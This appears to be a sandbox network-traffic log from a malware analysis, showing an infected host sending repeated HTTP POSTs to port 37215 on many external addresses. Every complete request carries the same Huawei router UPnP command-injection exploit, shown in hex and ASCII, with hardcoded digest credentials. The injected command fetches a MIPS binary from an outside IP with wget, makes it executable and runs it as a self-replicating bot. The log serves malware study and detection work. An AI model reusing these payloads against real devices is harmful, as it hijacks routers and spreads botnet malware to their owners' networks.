2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  287192.168.2.136072241.55.118.21837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.227328062 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  288192.168.2.1349576157.94.131.5737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.227351904 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  289192.168.2.1359794157.142.234.7837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.227370024 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  290192.168.2.1350374157.193.32.21137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.227387905 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  291192.168.2.1348580129.145.167.10937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.227404118 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  292192.168.2.1355016157.42.62.12637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.227425098 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  293192.168.2.1350294157.220.127.9037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.227447033 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  294192.168.2.1354904197.254.232.8337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.227472067 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  295192.168.2.1347302157.235.210.25537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.227489948 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  296192.168.2.1343460155.71.165.22737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.227514982 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  297192.168.2.135167025.30.21.25237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.227536917 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
